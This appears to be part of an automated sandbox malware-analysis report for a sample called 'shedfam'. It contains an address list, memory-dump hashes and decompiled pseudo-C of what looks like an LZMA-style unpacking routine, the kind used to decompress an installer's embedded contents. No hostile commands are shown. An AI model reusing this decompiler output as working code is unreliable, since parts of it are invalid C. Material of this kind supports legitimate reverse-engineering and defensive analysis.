                                                                  0x00406af8
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406796
                                                                  0x00406799
                                                                  0x004067cf
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x00406902
                                                                  0x00406902
                                                                  0x00406905
                                                                  0x00406907
                                                                  0x00406b91
                                                                  0x00000000
                                                                  0x00406b91
                                                                  0x0040690d
                                                                  0x00406910
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406916
                                                                  0x0040691a
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x00000000
                                                                  0x0040691d
                                                                  0x0040679b
                                                                  0x0040679d
                                                                  0x0040679f
                                                                  0x004067a1
                                                                  0x004067a4
                                                                  0x004067a5
                                                                  0x004067a7
                                                                  0x004067a9
                                                                  0x004067ac
                                                                  0x004067af
                                                                  0x004067c5
                                                                  0x004067ca
                                                                  0x00406802
                                                                  0x00406802
                                                                  0x00406806
                                                                  0x00406832
                                                                  0x00406834
                                                                  0x0040683b
                                                                  0x0040683e
                                                                  0x00406841
                                                                  0x00406841
                                                                  0x00406846
                                                                  0x00406846
                                                                  0x00406848
                                                                  0x0040684b
                                                                  0x00406852
                                                                  0x00406855
                                                                  0x00406882
                                                                  0x00406882
                                                                  0x00406885
                                                                  0x00406888
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x00000000
                                                                  0x004068fc
                                                                  0x0040688a
                                                                  0x00406890
                                                                  0x00406893
                                                                  0x00406896
                                                                  0x00406899
                                                                  0x0040689c
                                                                  0x0040689f
                                                                  0x004068a2
                                                                  0x004068a5
                                                                  0x004068a8
                                                                  0x004068ab
                                                                  0x004068c4
                                                                  0x004068c6
                                                                  0x004068c9
                                                                  0x004068ca
                                                                  0x004068cd
                                                                  0x004068cf
                                                                  0x004068d2
                                                                  0x004068d4
                                                                  0x004068d6
                                                                  0x004068d9
                                                                  0x004068db
                                                                  0x004068de
                                                                  0x004068e2
                                                                  0x004068e4
                                                                  0x004068e4
                                                                  0x004068e5
                                                                  0x004068e8
                                                                  0x004068eb
                                                                  0x004068ad
                                                                  0x004068ad
                                                                  0x004068b5
                                                                  0x004068ba
                                                                  0x004068bc
                                                                  0x004068bf
                                                                  0x004068bf
                                                                  0x004068ee
                                                                  0x004068f5
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x004068f5
                                                                  0x00406808
                                                                  0x0040680b
                                                                  0x0040680d
                                                                  0x00406810
                                                                  0x00406813
                                                                  0x00406816
                                                                  0x00406818
                                                                  0x0040681b
                                                                  0x0040681e
                                                                  0x0040681e
                                                                  0x00406821
                                                                  0x00406821
                                                                  0x00406824
                                                                  0x0040682b
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x0040682b
                                                                  0x004067b1
                                                                  0x004067b4
                                                                  0x004067b6
                                                                  0x004067b9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406518
                                                                  0x00406518
                                                                  0x0040651c
                                                                  0x00406b61
                                                                  0x00000000
                                                                  0x00406b61
                                                                  0x00406522
                                                                  0x00406525
                                                                  0x00406528
                                                                  0x0040652b
                                                                  0x0040652e
                                                                  0x00406531
                                                                  0x00406534
                                                                  0x00406536
                                                                  0x00406539
                                                                  0x0040653c
                                                                  0x0040653f
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406924
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040692a
                                                                  0x0040692d
                                                                  0x00406930
                                                                  0x00406933
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406938
                                                                  0x0040693b
                                                                  0x0040693e
                                                                  0x00406941
                                                                  0x00406944
                                                                  0x00406947
                                                                  0x00406948
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694d
                                                                  0x00406950
                                                                  0x00406953
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695d
                                                                  0x0040695f
                                                                  0x00406962
                                                                  0x00000000
                                                                  0x00406964
                                                                  0x00000000
                                                                  0x00406964
                                                                  0x00406962
                                                                  0x00406b97
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                                                                  • Instruction ID: 56628f401a4fc6d73e137493fcd66a1037cbd66c5efac646bb7951d26cabb475
                                                                  • Opcode Fuzzy Hash: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                                                                  • Instruction Fuzzy Hash: CF815871D00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 98%
                                                                  			E004065D2() {
                                                                  				signed int _t539;
                                                                  				unsigned short _t540;
                                                                  				signed int _t541;
                                                                  				void _t542;
                                                                  				signed int _t543;
                                                                  				signed int _t544;
                                                                  				signed int _t573;
                                                                  				signed int _t576;
                                                                  				signed int _t597;
                                                                  				signed int* _t614;
                                                                  				void* _t621;
                                                                  
                                                                  				L0:
                                                                  				while(1) {
                                                                  					L0:
                                                                  					if( *(_t621 - 0x40) != 1) {
                                                                  						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                  						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                  						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                  						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                  						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                  						_t539 =  *(_t621 - 4) + 0x664;
                                                                  						 *(_t621 - 0x58) = _t539;
                                                                  						goto L68;
                                                                  					} else {
                                                                  						 *(__ebp - 0x84) = 8;
                                                                  						while(1) {
                                                                  							L132:
                                                                  							 *(_t621 - 0x54) = _t614;
                                                                  							while(1) {
                                                                  								L133:
                                                                  								_t540 =  *_t614;
                                                                  								_t597 = _t540 & 0x0000ffff;
                                                                  								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                  								if( *(_t621 - 0xc) >= _t573) {
                                                                  									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                  									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                  									 *(_t621 - 0x40) = 1;
                                                                  									_t541 = _t540 - (_t540 >> 5);
                                                                  									 *_t614 = _t541;
                                                                  								} else {
                                                                  									 *(_t621 - 0x10) = _t573;
                                                                  									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                  									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                  								}
                                                                  								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                  									goto L139;
                                                                  								}
                                                                  								L137:
                                                                  								if( *(_t621 - 0x6c) == 0) {
                                                                  									 *(_t621 - 0x88) = 5;
                                                                  									L170:
                                                                  									_t576 = 0x22;
                                                                  									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                  									_t544 = 0;
                                                                  									L172:
                                                                  									return _t544;
                                                                  								}
                                                                  								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                  								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                  								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                  								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                  								L139:
                                                                  								_t542 =  *(_t621 - 0x84);
                                                                  								while(1) {
                                                                  									 *(_t621 - 0x88) = _t542;
                                                                  									while(1) {
                                                                  										L1:
                                                                  										_t543 =  *(_t621 - 0x88);
                                                                  										if(_t543 > 0x1c) {
                                                                  											break;
                                                                  										}
                                                                  										switch( *((intOrPtr*)(_t543 * 4 +  &M00406BD6))) {
                                                                  											case 0:
                                                                  												if( *(_t621 - 0x6c) == 0) {
                                                                  													goto L170;
                                                                  												}
                                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                  												_t543 =  *( *(_t621 - 0x70));
                                                                  												if(_t543 > 0xe1) {
                                                                  													goto L171;
                                                                  												}
                                                                  												_t547 = _t543 & 0x000000ff;
                                                                  												_push(0x2d);
                                                                  												asm("cdq");
                                                                  												_pop(_t578);
                                                                  												_push(9);
                                                                  												_pop(_t579);
                                                                  												_t617 = _t547 / _t578;
                                                                  												_t549 = _t547 % _t578 & 0x000000ff;
                                                                  												asm("cdq");
                                                                  												_t612 = _t549 % _t579 & 0x000000ff;
                                                                  												 *(_t621 - 0x3c) = _t612;
                                                                  												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                  												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                  												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                  												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                  													L10:
                                                                  													if(_t620 == 0) {
                                                                  														L12:
                                                                  														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                  														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                  														goto L15;
                                                                  													} else {
                                                                  														goto L11;
                                                                  													}
                                                                  													do {
                                                                  														L11:
                                                                  														_t620 = _t620 - 1;
                                                                  														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                  													} while (_t620 != 0);
                                                                  													goto L12;
                                                                  												}
                                                                  												if( *(_t621 - 4) != 0) {
                                                                  													GlobalFree( *(_t621 - 4));
                                                                  												}
                                                                  												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                  												 *(_t621 - 4) = _t543;
                                                                  												if(_t543 == 0) {
                                                                  													goto L171;
                                                                  												} else {
                                                                  													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                  													goto L10;
                                                                  												}
                                                                  											case 1:
                                                                  												L13:
                                                                  												__eflags =  *(_t621 - 0x6c);
                                                                  												if( *(_t621 - 0x6c) == 0) {
                                                                  													 *(_t621 - 0x88) = 1;
                                                                  													goto L170;
                                                                  												}
                                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                  												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                  												_t45 = _t621 - 0x48;
                                                                  												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                  												__eflags =  *_t45;
                                                                  												L15:
                                                                  												if( *(_t621 - 0x48) < 4) {
                                                                  													goto L13;
                                                                  												}
                                                                  												_t555 =  *(_t621 - 0x40);
                                                                  												if(_t555 ==  *(_t621 - 0x74)) {
                                                                  													L20:
                                                                  													 *(_t621 - 0x48) = 5;
                                                                  													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                  													goto L23;
                                                                  												}
                                                                  												 *(_t621 - 0x74) = _t555;
                                                                  												if( *(_t621 - 8) != 0) {
                                                                  													GlobalFree( *(_t621 - 8));
                                                                  												}
                                                                  												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                  												 *(_t621 - 8) = _t543;
                                                                  												if(_t543 == 0) {
                                                                  													goto L171;
                                                                  												} else {
                                                                  													goto L20;
                                                                  												}
                                                                  											case 2:
                                                                  												L24:
                                                                  												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                  												 *(_t621 - 0x84) = 6;
                                                                  												 *(_t621 - 0x4c) = _t562;
                                                                  												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                  												goto L132;
                                                                  											case 3:
                                                                  												L21:
                                                                  												__eflags =  *(_t621 - 0x6c);
                                                                  												if( *(_t621 - 0x6c) == 0) {
                                                                  													 *(_t621 - 0x88) = 3;
                                                                  													goto L170;
                                                                  												}
                                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                  												_t67 = _t621 - 0x70;
                                                                  												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                  												__eflags =  *_t67;
                                                                  												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                  												L23:
                                                                  												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                  												if( *(_t621 - 0x48) != 0) {
                                                                  													goto L21;
                                                                  												}
                                                                  												goto L24;
                                                                  											case 4:
                                                                  												L133:
                                                                  												_t540 =  *_t614;
                                                                  												_t597 = _t540 & 0x0000ffff;
                                                                  												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                  												if( *(_t621 - 0xc) >= _t573) {
                                                                  													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                  													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                  													 *(_t621 - 0x40) = 1;
                                                                  													_t541 = _t540 - (_t540 >> 5);
                                                                  													 *_t614 = _t541;
                                                                  												} else {
                                                                  													 *(_t621 - 0x10) = _t573;
                                                                  													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                  													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                  												}
                                                                  												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                  													goto L139;
                                                                  												}
                                                                  											case 5:
                                                                  												goto L137;
                                                                  											case 6:
                                                                  												__edx = 0;
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													__eax =  *(__ebp - 4);
                                                                  													__ecx =  *(__ebp - 0x38);
                                                                  													 *(__ebp - 0x34) = 1;
                                                                  													 *(__ebp - 0x84) = 7;
                                                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                  													L132:
                                                                  													 *(_t621 - 0x54) = _t614;
                                                                  													goto L133;
                                                                  												}
                                                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                  												__esi =  *(__ebp - 0x60);
                                                                  												__cl = 8;
                                                                  												__cl = 8 -  *(__ebp - 0x3c);
                                                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                  												__ecx =  *(__ebp - 0x3c);
                                                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                  												__ecx =  *(__ebp - 4);
                                                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                  												__eflags =  *(__ebp - 0x38) - 4;
                                                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  												if( *(__ebp - 0x38) >= 4) {
                                                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                  													if( *(__ebp - 0x38) >= 0xa) {
                                                                  														_t98 = __ebp - 0x38;
                                                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                  														__eflags =  *_t98;
                                                                  													} else {
                                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                  													}
                                                                  												} else {
                                                                  													 *(__ebp - 0x38) = 0;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                                                  												if( *(__ebp - 0x34) == __edx) {
                                                                  													__ebx = 0;
                                                                  													__ebx = 1;
                                                                  													goto L61;
                                                                  												} else {
                                                                  													__eax =  *(__ebp - 0x14);
                                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                                  														__eflags = __eax;
                                                                  													}
                                                                  													__ecx =  *(__ebp - 8);
                                                                  													__ebx = 0;
                                                                  													__ebx = 1;
                                                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                  													goto L41;
                                                                  												}
                                                                  											case 7:
                                                                  												goto L0;
                                                                  											case 8:
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													__eax =  *(__ebp - 4);
                                                                  													__ecx =  *(__ebp - 0x38);
                                                                  													 *(__ebp - 0x84) = 0xa;
                                                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                  												} else {
                                                                  													__eax =  *(__ebp - 0x38);
                                                                  													__ecx =  *(__ebp - 4);
                                                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                                                  													 *(__ebp - 0x84) = 9;
                                                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                  												}
                                                                  												while(1) {
                                                                  													L132:
                                                                  													 *(_t621 - 0x54) = _t614;
                                                                  													goto L133;
                                                                  												}
                                                                  											case 9:
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													goto L89;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x60);
                                                                  												if( *(__ebp - 0x60) == 0) {
                                                                  													goto L171;
                                                                  												}
                                                                  												__eax = 0;
                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                  												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                  												__eflags = _t258;
                                                                  												0 | _t258 = _t258 + _t258 + 9;
                                                                  												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                  												goto L75;
                                                                  											case 0xa:
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													__eax =  *(__ebp - 4);
                                                                  													__ecx =  *(__ebp - 0x38);
                                                                  													 *(__ebp - 0x84) = 0xb;
                                                                  													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                  													while(1) {
                                                                  														L132:
                                                                  														 *(_t621 - 0x54) = _t614;
                                                                  														goto L133;
                                                                  													}
                                                                  												}
                                                                  												__eax =  *(__ebp - 0x28);
                                                                  												goto L88;
                                                                  											case 0xb:
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													__ecx =  *(__ebp - 0x24);
                                                                  													__eax =  *(__ebp - 0x20);
                                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  												} else {
                                                                  													__eax =  *(__ebp - 0x24);
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x28);
                                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  												L88:
                                                                  												__ecx =  *(__ebp - 0x2c);
                                                                  												 *(__ebp - 0x2c) = __eax;
                                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  												L89:
                                                                  												__eax =  *(__ebp - 4);
                                                                  												 *(__ebp - 0x80) = 0x15;
                                                                  												__eax =  *(__ebp - 4) + 0xa68;
                                                                  												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                  												goto L68;
                                                                  											case 0xc:
                                                                  												L99:
                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                  													 *(__ebp - 0x88) = 0xc;
                                                                  													goto L170;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x70);
                                                                  												__eax =  *(__ebp - 0xc);
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												_t334 = __ebp - 0x70;
                                                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                  												__eflags =  *_t334;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												__eax =  *(__ebp - 0x2c);
                                                                  												goto L101;
                                                                  											case 0xd:
                                                                  												L37:
                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                  													 *(__ebp - 0x88) = 0xd;
                                                                  													goto L170;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x70);
                                                                  												__eax =  *(__ebp - 0xc);
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												_t122 = __ebp - 0x70;
                                                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                  												__eflags =  *_t122;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												L39:
                                                                  												__eax =  *(__ebp - 0x40);
                                                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                  													goto L48;
                                                                  												}
                                                                  												__eflags = __ebx - 0x100;
                                                                  												if(__ebx >= 0x100) {
                                                                  													goto L54;
                                                                  												}
                                                                  												L41:
                                                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                  												__ecx =  *(__ebp - 0x58);
                                                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                  												 *(__ebp - 0x48) = __eax;
                                                                  												__eax = __eax + 1;
                                                                  												__eax = __eax << 8;
                                                                  												__eax = __eax + __ebx;
                                                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  												__ax =  *__esi;
                                                                  												 *(__ebp - 0x54) = __esi;
                                                                  												__edx = __ax & 0x0000ffff;
                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  													__cx = __ax;
                                                                  													 *(__ebp - 0x40) = 1;
                                                                  													__cx = __ax >> 5;
                                                                  													__eflags = __eax;
                                                                  													__ebx = __ebx + __ebx + 1;
                                                                  													 *__esi = __ax;
                                                                  												} else {
                                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                  													0x800 = 0x800 - __edx;
                                                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                  													__ebx = __ebx + __ebx;
                                                                  													 *__esi = __cx;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  													goto L39;
                                                                  												} else {
                                                                  													goto L37;
                                                                  												}
                                                                  											case 0xe:
                                                                  												L46:
                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                  													 *(__ebp - 0x88) = 0xe;
                                                                  													goto L170;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x70);
                                                                  												__eax =  *(__ebp - 0xc);
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												_t156 = __ebp - 0x70;
                                                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                  												__eflags =  *_t156;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												while(1) {
                                                                  													L48:
                                                                  													__eflags = __ebx - 0x100;
                                                                  													if(__ebx >= 0x100) {
                                                                  														break;
                                                                  													}
                                                                  													__eax =  *(__ebp - 0x58);
                                                                  													__edx = __ebx + __ebx;
                                                                  													__ecx =  *(__ebp - 0x10);
                                                                  													__esi = __edx + __eax;
                                                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  													__ax =  *__esi;
                                                                  													 *(__ebp - 0x54) = __esi;
                                                                  													__edi = __ax & 0x0000ffff;
                                                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  													if( *(__ebp - 0xc) >= __ecx) {
                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  														__cx = __ax;
                                                                  														_t170 = __edx + 1; // 0x1
                                                                  														__ebx = _t170;
                                                                  														__cx = __ax >> 5;
                                                                  														__eflags = __eax;
                                                                  														 *__esi = __ax;
                                                                  													} else {
                                                                  														 *(__ebp - 0x10) = __ecx;
                                                                  														0x800 = 0x800 - __edi;
                                                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  														__ebx = __ebx + __ebx;
                                                                  														 *__esi = __cx;
                                                                  													}
                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  														continue;
                                                                  													} else {
                                                                  														goto L46;
                                                                  													}
                                                                  												}
                                                                  												L54:
                                                                  												_t173 = __ebp - 0x34;
